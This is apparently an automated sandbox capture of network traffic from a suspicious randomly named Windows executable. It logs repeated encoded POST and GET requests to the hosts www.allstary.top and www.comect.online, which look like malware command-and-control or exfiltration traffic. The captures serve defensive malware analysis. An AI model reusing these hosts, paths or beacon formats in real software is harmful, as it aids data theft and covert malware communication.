                                                                                                                                    Jan 10, 2025 19:47:36.864126921 CET1236INData Raw: 6c 6c 3d 22 23 61 65 31 63 32 38 22 20 64 3d 22 4d 30 20 30 68 35 31 32 76 31 36 39 2e 39 32 48 30 7a 22 2f 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: ll="#ae1c28" d="M0 0h512v169.92H0z"/></g></svg> </a> <a href="javascript:switchLanguage('en')" style="margin-left: 8px;" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="h
                                                                                                                                    Jan 10, 2025 19:47:36.869106054 CET1236INData Raw: 65 3d 22 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 69 73 69 62 6c
                                                                                                                                    Data Ascii: e=" margin-left: 15px;" rel="nofollow"> <div class="visible-md visible-lg" style="display: inline-block; max-width: 200px; border: 1px solid #2ba3f4; text-transform: uppercase; font-weight: bold; color: #2ba3f4; border-


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    13192.168.2.450021199.193.6.134805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:42.496697903 CET752OUTPOST /rdvg/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.allstary.top
                                                                                                                                    Origin: http://www.allstary.top
                                                                                                                                    Content-Length: 200
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.allstary.top/rdvg/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 65 58 66 47 39 75 53 6e 2f 70 57 42 7a 42 50 2f 74 52 74 2b 33 38 46 72 53 72 6f 65 69 74 51 70 73 4b 4c 41 44 51 75 37 67 32 31 33 6a 68 42 65 32 6c 7a 52 66 2f 2f 63 54 58 6b 78 45 63 30 30 37 78 54 56 56 2f 39 6d 46 39 64 43 30 46 2f 49 67 65 33 34 7a 2f 45 76 39 48 32 41 37 72 47 64 77 31 68 4a 36 38 34 6a 68 36 31 70 4d 54 50 6b 51 34 36 68 5a 76 34 33 57 39 4b 55 32 45 68 48 73 74 49 6f 59 35 41 5a 6b 32 44 35 37 4f 41 4a 61 78 61 6e 4c 56 6b 45 71 7a 73 73 37 4d 58 4b 36 52 54 6f 57 6e 46 32 32 6e 35 72 33 47 72 45 6f 43 46 50 55 69 57 72 4c 53 72 71 79 41 31 43 76 51 3d 3d
                                                                                                                                    Data Ascii: EzZ=eXfG9uSn/pWBzBP/tRt+38FrSroeitQpsKLADQu7g213jhBe2lzRf//cTXkxEc007xTVV/9mF9dC0F/Ige34z/Ev9H2A7rGdw1hJ684jh61pMTPkQ46hZv43W9KU2EhHstIoY5AZk2D57OAJaxanLVkEqzss7MXK6RToWnF22n5r3GrEoCFPUiWrLSrqyA1CvQ==
                                                                                                                                    Jan 10, 2025 19:47:43.079977989 CET533INHTTP/1.1 404 Not Found
                                                                                                                                    Date: Fri, 10 Jan 2025 18:47:42 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 389
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    14192.168.2.450022199.193.6.134805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:45.103970051 CET772OUTPOST /rdvg/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.allstary.top
                                                                                                                                    Origin: http://www.allstary.top
                                                                                                                                    Content-Length: 220
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.allstary.top/rdvg/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 65 58 66 47 39 75 53 6e 2f 70 57 42 31 52 66 2f 76 32 5a 2b 78 63 46 73 4f 37 6f 65 6f 4e 51 74 73 4b 48 41 44 52 71 52 67 6c 52 33 74 6a 5a 65 33 6e 62 52 59 2f 2f 63 48 48 6c 31 4b 38 30 6a 37 78 66 6e 56 36 46 6d 46 39 4a 43 30 48 6e 49 68 70 6a 2f 7a 76 45 74 6f 58 32 47 6d 62 47 64 77 31 68 4a 36 38 74 30 68 36 74 70 50 69 2f 6b 51 61 53 67 48 2f 34 30 52 39 4b 55 79 45 68 44 73 74 49 77 59 37 34 7a 6b 31 37 35 37 4c 38 4a 61 6a 79 67 45 56 6b 43 75 7a 74 62 6f 65 2b 6f 37 41 6d 48 56 32 74 73 31 47 52 58 37 67 6d 65 35 7a 6b 59 47 69 79 59 57 56 69 65 2f 44 49 4c 30 65 6e 76 64 4b 42 6c 55 62 78 5a 53 78 42 4f 77 48 4d 77 75 64 4d 3d
                                                                                                                                    Data Ascii: EzZ=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglR3tjZe3nbRY//cHHl1K80j7xfnV6FmF9JC0HnIhpj/zvEtoX2GmbGdw1hJ68t0h6tpPi/kQaSgH/40R9KUyEhDstIwY74zk1757L8JajygEVkCuztboe+o7AmHV2ts1GRX7gme5zkYGiyYWVie/DIL0envdKBlUbxZSxBOwHMwudM=
                                                                                                                                    Jan 10, 2025 19:47:45.670983076 CET533INHTTP/1.1 404 Not Found
                                                                                                                                    Date: Fri, 10 Jan 2025 18:47:45 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 389
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    15192.168.2.450023199.193.6.134805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:47.839987993 CET10854OUTPOST /rdvg/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.allstary.top
                                                                                                                                    Origin: http://www.allstary.top
                                                                                                                                    Content-Length: 10300
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.allstary.top/rdvg/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 65 58 66 47 39 75 53 6e 2f 70 57 42 31 52 66 2f 76 32 5a 2b 78 63 46 73 4f 37 6f 65 6f 4e 51 74 73 4b 48 41 44 52 71 52 67 6c 5a 33 74 51 52 65 33 42 54 52 5a 2f 2f 63 45 48 6c 32 4b 38 31 68 37 78 33 6a 56 37 35 59 46 2b 78 43 30 69 37 49 6f 34 6a 2f 38 76 45 74 33 6e 32 48 37 72 48 56 77 31 78 4e 36 38 39 30 68 36 74 70 50 68 58 6b 48 59 36 67 46 2f 34 33 57 39 4c 56 32 45 67 6b 73 74 51 4b 59 37 38 4a 6c 46 62 35 37 76 67 4a 63 57 47 67 4e 56 6b 41 70 7a 74 44 6f 65 69 65 37 41 36 68 56 32 70 53 31 46 4e 58 34 57 72 6e 2b 42 59 43 45 7a 79 6a 42 48 43 31 2b 44 78 4b 36 64 37 61 5a 6f 31 65 41 76 6c 61 52 77 73 63 75 56 59 6c 2f 6f 66 4c 6d 45 41 73 77 77 4d 6b 55 45 59 4b 6c 48 45 4c 61 2b 48 4c 65 65 67 32 54 4f 33 73 6a 44 4e 73 38 36 46 36 35 45 4e 6a 33 52 54 33 47 67 78 4f 37 4b 39 6f 6c 35 45 4b 33 41 36 4c 31 30 55 4f 64 72 6e 39 52 74 47 64 51 69 34 4f 58 47 6c 44 64 59 54 6f 39 48 4a 50 59 67 72 6a 67 54 7a 58 48 74 2b 34 36 44 41 4c 78 38 66 43 37 31 6b 42 6a 76 77 72 52 30 [TRUNCATED]
                                                                                                                                    Data Ascii: EzZ=eXfG9uSn/pWB1Rf/v2Z+xcFsO7oeoNQtsKHADRqRglZ3tQRe3BTRZ//cEHl2K81h7x3jV75YF+xC0i7Io4j/8vEt3n2H7rHVw1xN6890h6tpPhXkHY6gF/43W9LV2EgkstQKY78JlFb57vgJcWGgNVkApztDoeie7A6hV2pS1FNX4Wrn+BYCEzyjBHC1+DxK6d7aZo1eAvlaRwscuVYl/ofLmEAswwMkUEYKlHELa+HLeeg2TO3sjDNs86F65ENj3RT3GgxO7K9ol5EK3A6L10UOdrn9RtGdQi4OXGlDdYTo9HJPYgrjgTzXHt+46DALx8fC71kBjvwrR0KVbv4zKP2R/V8B8alHkGlnubr2vbgV7l1yLgURFCmXfEq+Jwv6W5ze5+jff32FWQfyYGHNklKBNodBXo4f19M/JROR8WqyeTPBTh5WkMhSdirPel+4yAJ4OpROqn6PocVK359kgOMbhBGZXt6B1vKNxPmFGEdeJcTz/pXJDgOZIXDZEyt6HgNxjS8zVKEHOoVX0DLIMroT4H6pvz4bfh1lgHYR3RPg6Gx1rQ2AuGSTsiszNbo9Dn9ep9pAA2YWS4TfZboLdjNYuX/5wnIMYq+3dPIG0hZkVn5iGdmdWkM5/9r6TVsnLQbsOCCaBYPzVN57oRwpzruvytjaUm57iTQHRy0g5tsRwzyTi/lWV6+nINLgPYpF+jPjbd7MpgMOH7klxgbTb4cqKZUphEhceQgNAdphg/owR1XgAPLZGFr1YgDNVDDNzG92AIvj4v6oCnttvjy4vgtGguvH6Lu0x6AuQgAyRs/um+bSvsJSxSMWiCH4smci+dV3xIQpjPzW43IgonbiDoEfCOG2vToHd25Met1g5V4Ku7dLuJvL7a/Sy7Xistj+CmyyWEWDIZdCDv425dqwESAK/1TgAxgcdjiaM63/5Inl5Aaxk/qqqeGRKcmwlb8Wi1nkcmT6jqr2SHcUtbR17UE7c1zHPmm09FfPACn4cATCjRqY [TRUNCATED]
                                                                                                                                    Jan 10, 2025 19:47:48.409528017 CET533INHTTP/1.1 404 Not Found
                                                                                                                                    Date: Fri, 10 Jan 2025 18:47:48 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 389
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    16192.168.2.450024199.193.6.134805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:47:50.488270998 CET497OUTGET /rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.allstary.top
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Jan 10, 2025 19:47:51.047204971 CET548INHTTP/1.1 404 Not Found
                                                                                                                                    Date: Fri, 10 Jan 2025 18:47:50 GMT
                                                                                                                                    Server: Apache
                                                                                                                                    Content-Length: 389
                                                                                                                                    Connection: close
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    17192.168.2.450025124.6.61.130805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:48:08.609489918 CET755OUTPOST /hmf8/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Origin: http://www.comect.online
                                                                                                                                    Content-Length: 200
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.comect.online/hmf8/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 6b 45 59 63 2f 74 4b 57 39 6e 43 57 6d 4d 45 5a 73 56 70 74 38 41 42 77 41 5a 64 75 6a 63 44 31 43 46 53 4e 50 72 2b 34 4b 4d 44 57 73 65 31 43 44 78 6a 79 77 54 2f 46 48 4d 65 68 74 31 66 66 55 48 59 4e 52 67 30 55 67 62 6d 79 64 78 4b 69 4f 47 67 37 38 4b 4f 6b 49 44 49 6e 67 64 6e 79 67 61 47 2b 6a 77 4d 77 78 77 4e 31 44 72 67 61 37 53 51 56 37 68 6b 71 47 4b 4c 72 46 34 37 45 79 73 79 34 66 50 76 69 2f 77 43 63 30 33 4f 72 79 4d 7a 49 72 4a 78 78 38 67 47 4a 33 35 42 7a 41 32 52 31 6d 49 63 46 56 62 31 62 33 7a 58 77 48 46 73 70 75 75 76 79 66 53 78 55 70 74 76 77 41 41 3d 3d
                                                                                                                                    Data Ascii: EzZ=kEYc/tKW9nCWmMEZsVpt8ABwAZdujcD1CFSNPr+4KMDWse1CDxjywT/FHMeht1ffUHYNRg0UgbmydxKiOGg78KOkIDIngdnygaG+jwMwxwN1Drga7SQV7hkqGKLrF47Eysy4fPvi/wCc03OryMzIrJxx8gGJ35BzA2R1mIcFVb1b3zXwHFspuuvyfSxUptvwAA==


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    18192.168.2.450026124.6.61.130805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:48:11.163376093 CET775OUTPOST /hmf8/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Origin: http://www.comect.online
                                                                                                                                    Content-Length: 220
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.comect.online/hmf8/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 6b 45 59 63 2f 74 4b 57 39 6e 43 57 6c 75 51 5a 72 47 42 74 37 67 42 78 50 35 64 75 6f 38 44 78 43 46 65 4e 50 6f 79 52 4b 36 72 57 73 36 6c 43 41 77 6a 79 7a 54 2f 46 4e 73 65 6b 75 46 66 55 55 48 55 7a 52 67 34 55 67 61 43 79 64 7a 53 69 4f 31 34 34 38 61 4f 6d 57 6a 49 6c 75 39 6e 79 67 61 47 2b 6a 77 70 74 78 30 70 31 44 61 77 61 36 7a 51 57 32 42 6b 72 42 4b 4c 72 42 34 37 49 79 73 7a 76 66 4c 76 59 2f 32 4f 63 30 79 4b 72 79 35 48 58 6c 35 77 62 32 41 48 58 2f 4d 6f 52 50 47 63 46 68 49 63 6c 53 34 68 62 79 31 61 71 57 30 4e 2b 38 75 4c 42 43 56 34 67 6b 75 53 35 62 4c 73 74 79 67 36 55 42 4d 4d 33 42 50 46 36 5a 30 64 57 45 34 73 3d
                                                                                                                                    Data Ascii: EzZ=kEYc/tKW9nCWluQZrGBt7gBxP5duo8DxCFeNPoyRK6rWs6lCAwjyzT/FNsekuFfUUHUzRg4UgaCydzSiO1448aOmWjIlu9nygaG+jwptx0p1Dawa6zQW2BkrBKLrB47IyszvfLvY/2Oc0yKry5HXl5wb2AHX/MoRPGcFhIclS4hby1aqW0N+8uLBCV4gkuS5bLstyg6UBMM3BPF6Z0dWE4s=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    19192.168.2.450027124.6.61.130805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:48:13.742569923 CET10857OUTPOST /hmf8/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.comect.online
                                                                                                                                    Origin: http://www.comect.online
                                                                                                                                    Content-Length: 10300
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.comect.online/hmf8/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 6b 45 59 63 2f 74 4b 57 39 6e 43 57 6c 75 51 5a 72 47 42 74 37 67 42 78 50 35 64 75 6f 38 44 78 43 46 65 4e 50 6f 79 52 4b 36 54 57 73 4e 4e 43 41 54 4c 79 79 54 2f 46 4f 73 65 6c 75 46 66 46 55 45 6b 2f 52 67 6b 71 67 5a 71 79 63 53 79 69 49 41 55 34 79 61 4f 6d 65 44 49 67 67 64 6e 6e 67 65 69 36 6a 77 5a 74 78 30 70 31 44 5a 59 61 39 69 51 57 30 42 6b 71 47 4b 4c 64 46 34 37 6b 79 71 61 61 66 4c 69 76 2f 47 75 63 31 53 61 72 77 72 66 58 6e 5a 77 5a 78 41 48 66 2f 4d 73 6e 50 47 52 38 68 4c 41 44 53 35 5a 62 2f 7a 2f 4a 42 33 78 41 76 50 62 59 56 55 59 45 67 75 4b 75 55 71 59 4f 6b 78 57 66 45 4e 42 56 5a 49 67 79 4c 48 31 76 65 63 4e 75 63 41 5a 37 43 31 68 69 44 48 73 6c 58 66 55 56 35 76 76 2f 64 50 66 6b 45 66 36 55 4a 39 6a 46 6d 68 4a 42 43 4d 70 53 2f 78 43 6e 61 6e 61 2f 37 6b 35 69 58 68 2b 36 34 78 4d 6d 64 33 55 76 72 37 62 63 47 78 6a 61 71 65 4c 67 36 69 70 74 75 67 56 35 70 66 71 50 59 78 6e 2b 4d 6d 6c 48 6f 34 72 69 4c 4a 38 4a 36 6a 50 77 49 77 32 76 6a 52 43 55 32 71 [TRUNCATED]
